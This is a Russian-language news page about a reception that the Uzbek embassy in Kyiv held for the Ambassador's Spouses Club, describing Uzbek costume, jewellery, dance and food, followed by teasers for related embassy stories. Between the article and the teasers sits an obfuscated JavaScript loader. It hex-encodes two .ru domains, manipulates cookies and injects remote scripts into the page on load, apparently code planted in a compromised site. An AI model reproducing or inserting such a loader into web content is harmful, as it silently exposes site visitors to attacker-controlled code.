RU  UK  EN
Статьи  >  Узнай  >  Посольство Узбекистана в Киеве приветливо встретило участниц Ambassador’s Spouses Club Kiev

Посольство Узбекистана в Киеве приветливо встретило участниц Ambassador’s Spouses Club Kiev

Ambassador’s Spouses Club Kiev, объединяет жен дипломатов, глав дипломатических миссий разных стран в Украине и ведет активную светскую, культурную и благотворительную жизнь. Также, в рамках работы организации каждая из участниц старается познакомить коллег с достояниями своей родной страны.

Именно с этой целью собрала участниц Гульноза Абдуалиева - жена Чрезвычайного и Полномочного Посла Узбекистана в Украине Алишера Абдуалиева. Торжественная встреча была приурочена специально ко Дню независимости Узбекистана. К этому значимому празднику, госпожа Гульноза, при поддержке Посольства Узбекистана решила привнести частичку неповторимого востока в украинскую столицу. И, через традиционные, к тому же небезразличные, каждой женщине особенности такие как: одежда, танцы и кухня, познакомить гостей со своей культурой.

Для всех пришедших хозяйка встречи подготовила познавательный фильм, который на несколько минут перенес на прогулку по удивительным парками Ташкента и тщательно оберегающему дух старины Самарканду…

Свой рассказ госпожа Гульноза начала с представления выставки нарядов, отображающей особенности разных регионов Узбекистана. Перед гостями открылся весь спектр восточной самобытности, отображенный через творческий подход и мастерство узбекского народа. Старинные костюмы в стиле «этно», (паранджа, халат-чапан), оформленные аутентичными элементами, показали неповторимое сочетание вековых традиций, исторических особенностей, и жизненного уклада…

Национальная одежда для узбеков имела важное значение еще с самых древних времен, а особое влияние на ее формирование оказал Великий Шелковый путь. Будучи торговым маршрутом он начинался на землях Китая, и проходил через ближний Восток вплоть до Средиземного моря, пересекая Согдийские и Бактрийские земли, на которых и находятся современный Узбекистан. Охватывая такую впечатляющую часть территорий он способствовал передаче не только товаров, но и технологий, и идей. Благодаря такому обмену в стране стало активно развиваться шелководство, хлопководство и как следствие искусство изготовления тканей, в котором здешние мастера, без преувеличения, достигли совершенства! Потому, не кривя душой, можно сказать что Вся яркость и буйство красок этого солнечного государства отобразилась на полотне ткацкого станка!

Узбекский костюм удивляет своим многообразием, по цвету и орнаменту можно четко определить принадлежность каждого к региону, где он был создан. На территориях Бухары и Самарканда – в нарядах чаще используют бархат синего или бордового цвета, обильно вышитый золотой нитью. В Сурхандарьи и Каракалпакии предпочтение отдаётся шелку или хлопковой ткани, украшенным сплетенными крючком фрагментами. Для Ташкента и Коканда характерны полосатые халаты, имеющие элементы европейской одежды, а Хорезмский костюм, отличается обилием звенящих подвесок.

В свою очередь, детали из которых состоит национальная одежда женщин Узбекистана схожи для всех частей страны, это: халат, платье, тюбетейка или платок, шаровары и паранджа – уберегающая даму от посторонних взглядов. Последнее даже являлась своеобразным паспортом для ее обладательницы

К примеру, паранджа задекорированная большим количеством вышитых элементов говорила о материальном достатке ее хозяйки. Узоры отображали к какому роду принадлежит девушка. По соединенным рукавам легко можно было определить замужнюю женщину, а бомбоны, пришитые к ним, свидетельствовали о количестве детей. Возраст владелицы зачастую, определял цвет костюма. Так, молодые девушки предпочтительно надевали более яркие оттенки, а дамы в возрасте - тёмные тона. Лицо женщины покрывалось чачваном – это своего рода покрывало, что ткалось, обычно, из конского волоса, и способствовало хорошей вентиляции. Сейчас же паранджа ушла из повседневного обихода и используется только в ритуальных целях, на свадьбах и похоронных процессиях.

С неподдельным интересом участницы клуба также разглядывали украшения, демонстрирующиеся на выставке отдельной экспозицией. Возраст некоторых из аксессуаров составляет порядка ста лет. Важно, что помимо своих эстетических качеств колье, бусы или серьги также имели функции оберега, зачастую они были очень массивными, располагались в районе солнечного сплетения, и должны были защищать хозяйку от сглаза.

Но, сейчас, в условиях современной жизни национальная одежда все чаще используется в основном на театральных подмостках в сценических выступлениях. И, что бы продемонстрировать гостям мероприятия, как наряды выглядят на представительницах прекрасного пола, организаторы встречи приготовили для всех подарок в виде выступления хореографического ансамбля «Сабо», дополнившего царившую неповторимую атмосферу Востока посредством танцевальных номеров.

Узбекский танец -  является своеобразным монологом женщины. Восточная женщина не может рассказать о своих чувствах на словах и делает это посредством танцевальных па. Здесь, как и в Японском, Китайском или Индийском надо иметь выразительные глаза и руки, которые характеризуются плавностью и чувственностью движений. 

И что бы закрепить знакомство участников встречи с культурными особенностями Узбекистана, организаторы мероприятия, с характерным узбекам гостеприимством, угощали всех традиционными блюдами, среди которых были плов, чучвара, самса и восточные сладости. Глубокая история кухни тесно связана с прошлым и традициями страны. Значительное воздействие на ее разнообразие и специфику оказало то, что в отличие от географических соседей узбеки вели как оседлый образ жизни, так и кочевой. В то же время заимствование кулинарных традиций, смешивание культур оказало значимое влияние на разнообразие и богатство блюд. Происхождение многих из них имеет общие корни с азиатскими кушаньями, такими как, например, манты или плов. Привкус специй и аромат лакомств легким флером дополнили восточную атмосферу праздника. Госпожа Гульноза  с удовольствием делились со всеми желающими рецептурными тонкостями, что бы каждый мог затем воссоздать кулинарные шедевры Узбекистана не только в памяти и и на своей кухне.

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="16101",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("theoutlook.com.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Вам это будет интересно:
В Посольстве Германии презентовали немецкий перевод книги «Мистецтво Майдану»
В Посольстве Германии в Киеве прошла презентация немецкого перевода книги культуролога Натальи Мусиенко «Мистецтво Майдану» . Торжественное событие посетили Министр культуры Украины Евгений Нищук, Чрезвычайный и Полномочный Посол Германии в Украине Эрнст Райхель, автор книги Наталья Мусиенко, украинские культурные деятели, общественность, СМИ.
В Киеве стартовали Дни культуры Кувейта
В Киеве 5 февраля стартовали Дни культуры Кувейта, посвященные 25-летию установления дипломатических отношений между нашими странами. Все мероприятия пройдут при поддержке Посольства Кувейта в Украине и лично Чрезвычайного и Полномочного Посла Господина Рашида Хаммада Аль-Адвани.
При поддержке посольства Беларуси в столице прошел спектакль Минского театра-студии Киноактера
В Киевском академическом театре драмы и комедии при поддержке Посольства Беларуси в Украине и Киевской городской государственной администрации прошел спектакль "Брачный договор" Минского театра-судии Киноактера. Постановка прошла в рамках гастрольного тура по Украине.
В Киеве прошел Кубок дипломатических миссий по беговым лыжам - 2018
В Киеве в Парке Национального технического университета Украины "Киевский политехнический институт им. Игоря Сикорского" состоялись четвертые ежегодные соревнования по беговым лыжам для дипломатов и всех желающих, организаторами которых были Украинский горнолыжный клуб совместно с посольствами Швейцарии, Австрии, Норвегии и Швеции, при поддержке одной из крупнейших украинских фабрик беговых лыж Fischer.
При поддержке посольства Венгрии прошла презентация венгерского вина
В Киеве при поддержке посольства Венгрии и лично Чрезвычайного и Полномочного Посла Эрно Кешкеня прошла презентация – дегустация венгерских вин. В рамках мероприятия представители Венгерского Национального торгового дома познакомили украинских партнеров с главными винными регионами страны и лучшими винами.
Дипломаты почтили память дипломатов - Праведников
В Киеве в Дипломатической академии Украины имени Геннадия Удовенко Министерство иностранных дел совместно с иностранным дипломатическим корпусом в Украине открыли выставку под названием «BEYOND DUTY». Проект «BEYOND DUTY» посвящен дипломатам - Праведникам народов мира, спасавших людей во время Холокоста.
В Киеве пройдут Дни кувейтской культуры
В столице Украины с 5 по 7 февраля пройдут Дни культуры Кувейта, посвященные 25-летию установления дипломатических отношений между нашими странами. Все мероприятия пройдут при поддержке Посольства Кувейта в Украине и лично Чрезвычайного и Полномочного Посла Господина Рашида Хаммада Аль-Адвани.
Посол Индии провел дипломатический прием в честь Дня Республики
Чрезвычайный и Полномочный Посол Индии в Украине Манодж Кумар Бхарти провел торжественный дипломатический прием в честь Дня Республики, который отмечается 26 января, он является одним из трех национальных праздников государства и официально был введен, когда вступила в силу Конституция страны, действующая и по сей день.
В Киеве прошло торжественное празднование Национального дня Республики Куба
Временный поверенный в делах Республики Куба в Украине Господин Оскар Сантана Леон провел торжественный прием в честь главного государственного праздника - Национального дня Республики Куба.
Посол Красимир Минчев провел дипломатический прием в честь председательства Болгарии в Совете Европейского союза
Чрезвычайный и Полномочный Посол Болгарии в Украине Красимир Минчев провел торжественный дипломатический прием в честь начала председательства в Совете Европейского союза.
Посол Венгрии провел торжественное мероприятие в честь Дня венгерской культуры
Чрезвычайный и Полномочный Посол Венгрии в Украине пан Эрно Кешкень провел торжественное мероприятие по случаю празднования Дня Венгерской культуры.
«Человек года: ориентиры успеха»
Определены обладатели международных и специальных премий 22-й общенациональной программы «Человек года – 2017». Чрезвычайный и Полномочный Посол Республики Корея в Украине Ли Янг Гу получит премию в области дипломатии.
Президент Украины принял верительные грамоты от послов Нидерландов, Ливана и Судана
Президент Украины Петр Порошенко принял верительные грамоты от послов иностранных государств: Королевства Нидерландов – Эдуарда Хукса, Ливанской Республики – Али Дахери, Республики Судан – Мохамеда Еиса Исмаила Дахаба.
ВИДЕО. Вифлеем: абсолютная святость
Посольство Палестины в Украине и лично Чрезвычайный и Полномочный Посол Мохаммед Аль-Асcад организовали поездку в Палестину для журналистов, в числе которых была и команда OUTLOOK. Мы запускаем серию видеосюжетов о том, чем может похвастаться и удивить эта страна. Начинаем с Вифлеема!
Поздравления украинцам от Чрезвычайных и Полномочных Послов иностранных государств в Украине
Чрезвычайные и Полномочные Послы Великобритании, Венгрии, Германии, Дании, Молдовы, Норвегии, США поздравляют украинцев с наступающими новогодними праздниками. Проект OUTLOOK, работающий в сфере культурной дипломатии, присоединяется к теплым пожеланиям дипломатов. В наступающем 2018 году мы планируем еще больше важных проектов, направленных на популяризацию иностранных культур в Украине, установление дружеских отношений между народами и формирование межкультурного диалога.
Виталий Кличко провел дипломатический прием в честь Новогодних праздников
Мэр Киева Виталий Кличко провел в мэрии традиционный дипломатический прием по случаю грядущих праздников - Нового года и Рождества Христова.
Посольство Швеции в Украине провело празднования Дня святой Люсии
13 декабря в Киеве отметили один из традиционных шведских праздников - День святой Люсии.
Посольство Испании в Украине провело торжественные мероприятия в Киеве...
13 декабря в Национальной библиотеке Украины для детей состоялась церемония дарения книг. После чего в резиденции Чрезвычайный и Полномочный Посол Испании в Украине Сильвия Кортес Мартин провела дипломатический прием.
В рамках проекта Diplomatic Greetings супруга Посла Пакистана познакомила украинок с искусством росписи по ткани
Супруга Чрезвычайного и Полномочного Посла Пакистана в Украине Сима Аттар присоединилась к культурно-образовательному проекту OUTLOOK и ГДИП Diplomatic Greetings и провела необычный мастер-класс по изготовлению шалей, сумочек и декорированию подушек.
В честь 100-летия Дня Независимости Посол Финляндии в Украине провел дипломатический прием
В Киеве состоялся торжественный прием приуроченный к Национальному дню Финляндии. В этом году страна отметила ровно 100 лет от дня провозглашения Независимости.
Закрыть
Outlook facebook page